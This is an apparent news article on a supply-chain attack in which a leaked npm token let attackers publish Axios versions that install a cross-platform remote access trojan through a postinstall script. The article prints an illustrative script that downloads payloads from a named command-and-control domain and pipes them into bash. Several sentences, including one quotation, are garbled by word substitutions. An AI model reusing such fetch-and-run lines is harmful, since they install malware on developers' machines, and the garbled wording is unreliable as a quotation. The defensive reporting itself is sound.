What is OIDC Trusted Publisher and why didn't it prevent this attack?

OIDC Trusted Publisher cryptographically ties npm package publishes to verified CI/CD workflows. However, npm prioritized a pre-existing, long-lived access token over the OIDC verification, effectively bypassing the security layer. The legacy token remained a valid authentication method.

How can developers protect themselves from similar supply chain attacks?

Developers should immediately scan lockfiles for compromised packages, rotate all credentials, enforce `npm ci --ignore-scripts` in CI/CD pipelines, and prioritize verifying package provenance using tools like Sigstore. Regularly auditing and revoking unused or long-lived tokens is likewise critical.

Hackers slipped a trojan into the code library behind most of the internet. Your team is probably affected

Axios Supply Chain Attack: A Legacy Token’s Silent Override

The JavaScript ecosystem is reeling from yet another supply chain compromise, this time targeting Axios, the ubiquitous HTTP client. Attackers exploited a long-lived npm access token, bypassing modern security measures like OIDC and SLSA attestations, to inject a cross-platform remote access trojan (RAT) into two widely-downloaded versions of the library. This isn’t a failure of new security tooling; it’s a stark reminder that legacy authentication methods remain the weakest link in the software supply chain.

The Tech TL;DR:

Immediate Action Required: Organizations using Node.js must immediately scan lockfiles and CI logs for compromised Axios versions (1.14.1 and 0.30.4) and revert to known-good versions.
Credential Hygiene is Paramount: This attack underscores the critical need to rotate and rigorously manage all developer credentials, especially long-lived tokens, even when modern authentication methods are in place.
Provenance Verification is Key: While not universally adopted, verifying package provenance is now essential. Tools like Sigstore can aid establish trust in software dependencies.

The Workflow: A Precision Strike on the npm Registry

The attack, documented extensively by Wiz, Huntress, StepSecurity, and Socket, unfolded with chilling efficiency. The attacker gained access to the npm account of @jasonsaayman, a lead Axios maintainer, through a currently undisclosed method – likely credential compromise. They then changed the account email to a ProtonMail address, obscuring their identity. Crucially, the attacker didn’t modify the Axios source code directly. Instead, they published a malicious package, [email protected], as a dependency. This package contains a postinstall script that silently drops a RAT onto the developer’s machine, targeting macOS, Windows, and Linux. The staging was meticulous: a clean version of plain-crypto-js was published 18 hours prior to build publishing history and evade initial scanner alerts.

The attacker leveraged a critical flaw in npm’s authentication hierarchy. Despite the Axios project implementing OIDC Trusted Publisher – a cryptographic mechanism tying publishes to verified CI/CD workflows – npm prioritized a pre-existing, long-lived access token. This token, intended for legacy compatibility, effectively bypassed the OIDC security layer. As Merritt Baer, CSO at Enkrypt AI and former Deputy CISO at AWS, noted in a VentureBeat interview, “It’s very common for old auth mechanisms to linger. Modern controls obtain deployed, but if legacy tokens or keys aren’t retired, the system quietly favors them.” This echoes the SolarWinds breach, where legacy scripts circumvented newer monitoring systems.

The Technical Anatomy of the Compromise

The malicious releases, [email protected] and [email protected], were live on the npm registry for approximately three hours before being removed. StepSecurity’s analysis revealed that the malicious versions lacked OIDC provenance, a trusted publisher record, and a gitHead linking to a specific commit – all hallmarks of a legitimate release. However, these checks are opt-in, and the npm registry didn’t automatically reject the compromised packages. The RAT itself erases itself after execution and replaces the package.json file, hindering forensic investigation.

Here’s a simplified example of how the malicious postinstall script might function (this is a conceptual illustration, not the exact code):

 #!/bin/bash # Simplified example - actual script is more complex PLATFORM=$(uname -s) if [[ "$PLATFORM" == "Darwin" ]]; then # macOS payload curl -sSL https://sfrclak.com/payload_macos.sh | bash elif [[ "$PLATFORM" == "Linux" ]]; then # Linux payload curl -sSL https://sfrclak.com/payload_linux.sh | bash elif [[ "$PLATFORM" == "CYGWIN_NT-10.0" || "$PLATFORM" == "MINGW64_NT-10.0" ]]; then # Windows payload curl -sSL https://sfrclak.com/payload_windows.exe -o wt.exe fi

This script, executed automatically during the npm install process, downloads and executes a platform-specific payload from a command-and-control server (in this case, sfrclak.com, now blocked by many security vendors). The apply of shell scripting allows for cross-platform compatibility, maximizing the attack’s reach.

A Pattern of Attacks: Shai-Hulud, PackageGate, and Now Axios

This incident is the third major npm supply chain compromise in seven months, highlighting a systemic vulnerability in the JavaScript ecosystem. In September 2025, the Shai-Hulud worm infected over 500 packages, harvesting credentials and spreading laterally. CISA issued an advisory, and GitHub overhauled npm’s authentication model in response. Then, in January 2026, Koi Security’s PackageGate research uncovered six zero-day vulnerabilities in npm, pnpm, vlt, and Bun, demonstrating that even the defenses implemented after Shai-Hulud were insufficient.

“The recurring theme across npm breaches is credential compromise,” Baer emphasizes. “This isn’t just a weak password problem. It’s structural. Without ephemeral credentials, enforced MFA, or isolated build and signing environments, maintainer access remains the weak link.”

IT Triage: Securing Your Node.js Environment

The Axios compromise demands immediate action. Enterprises relying on Node.js should engage cybersecurity incident response teams to assess the impact and contain the breach. Proactive vulnerability scanning and penetration testing, offered by firms like SecureCode Solutions, can identify and mitigate similar risks. For smaller organizations lacking dedicated security resources, managed detection and response (MDR) services from providers like SentinelOne can provide continuous monitoring and threat detection.

The Future of Supply Chain Security

The npm ecosystem has made strides in supply chain security, with features like OIDC Trusted Publisher and SLSA attestations. However, these measures are only effective if they address the fundamental vulnerability: the human maintainer. Mandatory provenance attestation, where CLI publishing is disabled entirely, and multi-party signing, requiring multiple maintainers to approve releases, are crucial steps toward a more secure future. Npm has indicated plans to deprecate classic tokens when trusted publishing is enabled, but this change needs to be implemented swiftly. Until then, the Axios incident serves as a potent reminder that even the most sophisticated security infrastructure can be undermined by a single compromised credential.

Disclaimer: The technical analyses and security protocols detailed in this article are for informational purposes only. Always consult with certified IT and cybersecurity professionals before altering enterprise networks or handling sensitive data.